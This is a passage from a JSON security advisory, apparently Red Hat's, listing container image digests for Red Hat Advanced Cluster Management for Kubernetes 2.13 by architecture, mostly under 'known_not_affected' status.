"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:82107bc3ac83308ba96111cc5690a23d116bcd71c7a65face89e4d530b2e8382_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:a673e83cb652160fc3db1b69505d21a634a15fcc68f3940bda25f64dc0ae7bb6_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:a765f440d03be4c90a764f6ec1a2bf2d4c4acb0f8af630aff9811aaa631327ca_ppc64le"
],
"known_not_affected": [
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:01382838a23f75a6c03b30c68e9e42d72c22d773a4891260c639f7c8b60ffd87_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:1c74aaa66b6be9f5eb1f55851f1cc3f2a3878882c3fc972cd24232e9022f74e2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:696d1f7c4b5415e49760f7a66368aa0260284b12b108d5feb560838a9bce8a6f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7328602aa637f1b555ecd56c05d6ade8dbee48fae78a0118b1e39774b8383704_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:3ae25beb920ec77de14769895f60da6a3d83fc41192ca5da5f976076853e5a50_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:c9bf774dfa3f5a66339a86f22961c54b2b41199efd173b016a2c7c57407dae40_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:d1cac9d50ec20e770ae41aa8f90474c269d80e84a9990e2c3e613a892b0c044c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:ddb5d8c476bcc9b6d4a7c0d116a2f5150acbfa80cc890d77d5d90bd496a7860e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:0ffd5a902860aad15377e20b1e6481e6cf746fa3e33509df0f88f93f9a9f8034_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:abcf4d6f42dec254d8b4197282fb449daf13d4724ed23ddc2aafde0328338f74_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:b6ea1f6389ad207c45321ab5a36c03949986e74ef9dbf5e3d2fdb2ceb5c4a602_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:e126327d69e48f2844f5beafc34514d31e9f3eed0ac393399edf80cf31a2eabe_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:0f7b1ee143f154e6e33c452f95fd0a0afb7fd020e758a991d18abde990e49e0c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:6363dfb96f394aef2b07b3a36c85d3af60dc3594ab615327176ba520704a4356_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:849cf23afa514a1d86073fed2424e487893655510721a0b9c0d4be4cf59bf60b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:a8843c7b628767803f2aa4b2658dc0a932157b20f98507004929036108c7dfb2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:428a52072881ee7714539f7721313ca78e06fd0e39ceb8de12f8a0d33fb4cd55_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:5145c15e9fa57bdd1d072e7c88f27d5f8f51caf395e542ad8fb54a098f8c24fb_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:cb76c81b895dfb5bc384407baf76c5c74d9b509342e665f3d5ff234a40f16236_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:d7dae765d402cd9522c23689fc0e72f47659fc2f1184b8b16c51b6c5c6a2b890_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:5af546f1d36b01b320fd950d227cdd8f62a765facc8614ba277fe218c5649e61_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:921a7995304e4648ac2fd0c08bec7d95adc09caca4d6d124cbba4ff8043edf19_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:a0928fa238b82f2c00778064d0f1e52ff507ffef7a0a3756b1f2f2022d375e4b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:fdc436ea03cb2d06976da109061aa0793672c306deef23708ee9e0b39395b6f7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:2adb87f4433d9516e2111150bccafbbb8dec179bdf3fe3acd38d7b27411cb666_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:4afad9568dc7dd2d90c396d08d596258e813bb67e2901135b539f279af382e09_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:508d4d8ee312e8d720eeca38f3823438548c5ab1260d8fa822ca49765f7aeef5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:a31ab1ae8b4c3ead24f9ce3c913a4754972bd548d6e5b10ca22e61a6d9d3539a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:35ba01a14b8f7a0ed0e79fd9efe48280d26afa10a316daaec512f39cc6839adb_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:384d23bb3f4e6fd2425e1b60ded99f027dcbaad14e631ffbe84845821a1c3215_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:a8ca367caa43ec006811fe370fdf440328dd22fc39be11e48f36396b781f36bb_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:db8b5776a9dcb4b87a4de948c4c11d0164e66df188f97be6a6fd7e9953f5501e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:1e0a1eadbb77f4f14d48357af6a5b12406ae912210b53c14018b642e4f62d1fe_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:4816e73043b8f73143cff29cff41292e62bb36467ba28a260ee46fd43ece915c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:71d6b8f5471d7a23918763eeea53d991d98adf170e228348b77d2412ce752751_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:87f2e1ee942b226835c97b7abe43a62802146755141a850137b9ab03dd6fccf6_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:2b6a43ae23126321b9c94b37da646db4943331200434edc6a54be156150065f2_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:d24283b13f739561fae6bdfb730922a1d3804422dc41249e33e6084158afcec4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:e9df0b0323447cacad8942ecce2e690a9f498d5cb41b54e3bb55be6614ddaece_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:ed46808dba295cf093aa5caabc9782ee9f044c7e770adaf3657f57f0f6e1aaf9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:5a98450b5f85a75172ca51e2dcf096465635dc2e4c5fedfd74e1fdd665f3fa65_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:7388c812f31ff8f2b1c2653adf07906e2f50c356a1ad9130d3923d835e79e0e7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:bd521270153c8b5b8193e08fe4a7c959e5b9d22ed7e74a87827580974b3836f1_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:fc3b40899a332c041667de0965d58f50325eaddc8547145a2dff9aede38d69bb_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:0668bbb16723e23ae64e4337a1347a6e0d2854d1c173cbc59c17a829e430bc00_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:177c2cb59b6b43f4ea650bbb603b144ca37aece398635a458d518dd55cae7fb6_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:78b0d35ce4fce4d279ad089ccf284f5e1425f947d95c3c72c5755bb00464305c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:f3b200f2a00217299f66cab9f89de8673003d194292b41157f663799b5c61c3e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:02486920d371f14bcbafc720545c4a6f24523a46483e60c00c7f25f52b3ea476_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:1cb3639dfe65b6568b53de130e7b36b8f5ebceedd76c110ddb64fbe860bfde14_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:4124ae57ffa1b26bfc0e68b62c8325c5e17d332dca85b618a4ccba60cf52d1b5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:8243cc9646e4ae89aabf299e476a94124c8244dd54e0fb1c848a6bbbd0c94f62_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:2a64ce4183df6c5743ffa7df7b4192fce192e08eea5e03b76c9b621e5d351d2a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:4e6dd9d24ab247b2a7b84f7842b2a710eee3aa2fce58fc1516ef5bb55e0693f0_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:d814b3c076f9ef671d74e156dce5d3f634130904f166a6a04a59df41e8ec07ed_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:faeaa0d157334dcf9a808ea8916272c9912726580dc0ca06b6e3bb85860772ab_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:2bc6310bd61774d74b1dd0245139b3bfc4940efb1bf424ad0e7a4d822f2271b8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:95baf4ac24b7c9d2fb2883cdf81c7d75f76c8c53aef6745eb732918718877cd4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:c17ac85849d3cdf437d09d8ce9581b48a73304498a315db470ec655fdb88f529_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:f6dcad139d0a85137a293dd7cf8c68819658d71a1a45914030cfb7d58dac146d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:1ef6867542269af4ce8cee7225dfb4e64680715a1bb34ed510b9fbf84d88fb2d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:58a418395bf71e339145d259b6906172fbc066e17e05071ce983c5615e703075_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:81f72d7522fcc4a0e948e52987671328dcbfd726b54125a23d893cd45e6cbdd5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:f4ad6f2ed37be694b95b1c00b32f797cc29a0dab790207a254b4d4f4f2aa7158_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:723dd5b7b166ed9fcedd2f6b2b2567e943ffcfa78bfe7974ac410d629495bc27_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:7f20f9bb4a9b57b618fd864fd49ef0b1a1cb81d20668ba9f1bb2392086d7a144_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:b3b5013c3333ed731561416060e14930f276336fb23037c6a7109496faee095e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:ccc5e9181f23112628ee91c9acc577627a501af9bb170b2bf0eb0837811e7328_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:e8b775e29dbba36821b79231e35017cefd5bb6d245dd1c2d8004150c4998a89c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:eaa602fc272af9fce6ea4b2b2e700e24fc29b7fcaad3437abc73f247a5f994aa_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:ef6cd34e8f03c566dea492474495c0142a506b973b1a1ae00667de2993c88209_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:fbf35da688ccf2c7049320cee23dcbc518d2787d52c78574ff44e481a38ec20f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:38a4caea83181ce3f04956654ed3e2241a4563718a66ddf09eb0997afe47e0ce_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:54d57a40c0ebc2b7922552aff95b6219c10c4f1b27627d36bc800c1db33a4651_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:8fb71c30e1217f0697c872db2bafbb5e06a7f727c6b508f269512447d6b5118d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:e58abdba80628700eaf2736cb65e6746d2b2126cc7b19ba403c19be5e8a22509_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:83bc597e83bd0756afa67adcbd50858b0d1c23f87b572706e9059dd26055b4a0_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:a5ccbff1ad0a3001902044e52590ee18508632bce7822ebf54ba521eaae180eb_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:db8ed91f54d683d9d3be3b0747f7429eb95accc8802593dd61d8c24e8a1facfb_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:f3d2daf907e6fd32654d1458c60b134f4d938a933e53161e588bcd94ff6b01df_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:0aa9df5f5bf523f7d6d4a9e931a1932e62056d942bf86396d33874adc85a91e8_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:4d0252b36a0ca8f522e60e400463b22de506766bdf0c1f65e3e289a3c93002d1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:701bc2dd0a441216ea138b677dbf71d497d9b7acaad5f48661117008a8e5defe_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:b30887b0c8fb4292b6c87ef681761c18a112e0113647e2bde86c04c13f59b7a5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6b65f79a765b69a84ac5924280e9f6d55875b8aceb6ae97f9a75cb6076bd074a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6d410e7e4de91970f44368e5cc1ce1ac83908550785263342f6038a988be30e4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:736631a4d89bf44078b7f180ddcd474655d66ed43b85a4a79258eab9348656ff_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:ca58b27ea6673f0c506ed1ffad51918608a813dabf58f4845ab97d6e9f2c11d3_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:21f6d86d21be3a9541fc577a647d8f38b81bca975dc82d9506056f44e6a35443_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:60a3e7e83d189003d185e2415f96b4f3be0912e4cbaa96ea4ed8ebcdce5cc1d0_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:796abebd9573cacba87eb0c6497ed9617047eddba90f1c4b8237964ed954328d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:d130f2bb5b047483504d5c8113e0449983e79c49e8bda97b5752862930a91947_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:0a98f4d3e54b7410bfc1601f2ee2ba1308f30e40314bfc5169c3d99c3b8dfaa1_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:3148a9662d732bbad15d6bd89cce43a886cba68ba1cefcef55f7bb65d3159432_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:33c37b7bd401cfcf46d5cb42173fe3697a0649dc1080255dbd6243d4bfe8d08f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:cf1c1c1c778cafe6067df490969aab89a6b3e43487d954bb24b1409bc22f1091_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:118fe4fc31cb7818cda240c48628e5a3d43002c271fa7ba45d9631b7a6ddb8e2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:a2e5353298e0b0e46516d5127d0da65fcb5ac4498651693f347de1eb18e12095_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:b10f9f52f0665ae2a8bb4bf2649aa6e3d1185a0dffb9ebeb11a8900174df5ef2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:c2bfb459d7442878d591cc31436830b983fe30dcfa6f7d383cc91cb32e42fa7c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:55320965b17fef48e776d39c548f0bf81a1e9239ee4b90a032f4b111e8748d2f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:a36bcef862d0e3cc972c9eb2c0d80311030659c13de6acab7e353905ff5eccff_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:c7bfe530a7efe66f5c3e2e08b114b3b9e44072e3609725663d6a5f3945bda512_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:e73d91e157c13ea96615fc060f5312997203f6b6350d335917b2feacb96c9ca5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:2003587575e18b2e6b9bf3617c65e0f83ebc8cf30daf6dd241500cd1555820e0_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:6098254a7e2fdd67ef1773abda74d3dde3d31e59254f4a1cd5e77dc34d224602_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:7fa35da009ab6e41177f0589f6d3fbf1bbe3fff4b52add3bfbc516a046e35640_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:9418993b725bf813959ed5adbd21690ee2cbeeac3d56c7ab6805c3eb29b5d46f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:14fb16412dea57a775e95954c3a07a77de846f851935629bf9bfdbcc46a70f4f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:40f8ad6430cc767b56992722d5890f98882c7372950320d28e808c18714b7179_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:c227f25ae401af3eba9352765f906c8b873370485a7c748b1602e53c0776f90f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:ffb3e3cd6764e802b5e9f87034548f96dcacfeedd8fe2b3b21b06c41734e8320_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:24df1e0d7850220df3aa658c6056f81a68fe451ffd99e4d0dfee07cebe9c3782_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:25fb42a78847235c61e35f66a6e02dfee5fc0b6832aa4ce06c3c6f395b95b36d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:9e19fc6fd3285c1833cd97eeef10cb179fe9705dea9b3f912052207b3a2daea7_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:edc8b960038279c012c5aa99917361ad0888b0195c3ee9adb368b798a5bea2fb_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:231caddbaa1b499fae4efbf34c839941e595f242d12e22378e210b47de6262a8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:450199903a5d88d10b107768839780fbd0ee15535c6a998a0cac5bec942dd414_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:7fe0726987e478ed3da6d9b1eb4b611461e285ada827de6a186b95bc75a36c73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:8d8eb1e5a21a37f041f60fbd624c7861f2e726997c6ad1d5279f59a7c849f2af_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:1628ce0aab57c09dad7f5b2a24bf664de71b76a38cd05ccf281bb8cc8fc5859e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:7e3f01077df87eb91ece7c2bd6cfa2c15a0044c2f9c40efee9ce1bf14a6807b6_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:9bc74577f0edc3045a1a027c0f8652cc904fc3b9397dc9af10576f9dfcab2080_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:e9cab985b52c8f23b62cad3ea9c692e321a5347bd06fc56b19dfdb1801030567_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:01778cb2a2b9771a03ed8c7feb5b94a23225f60f4e49263e71dccd017cfd1164_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:0e4525617200428a5510108b0a0845fde43fd4e64804186af045df9680ca05b7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:903c920eb068fcabdd16fb95f78902107892efa8e8a1ddda124d7f6bc1afdcd8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:ac486bf6a84c573a9774aadd4ea995a551c0abcbfb42dbbb71dc03e6c900a211_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:61b112b8ebb2ca4e41f5ee4b0c09ad0b53c3a6b60297fb8c1f158c28a8f10b3d_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:6bd79f2c4c516adc626c73dec28892cbeab65e349dff8f1fcb11d7242b614805_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:c920a77dcf02347d116035d5cfef1a365e02022713788a14045a9be2a1bd1c5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:eb7788d29142ad36cba099b1dcebe3eb1c28366f87f611ca4d0b375bc7f4b19d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:5b7668d6f3b7fb994c4bbbb86bdb92d4258b88ab92337394b66058255c048ad8_amd64",
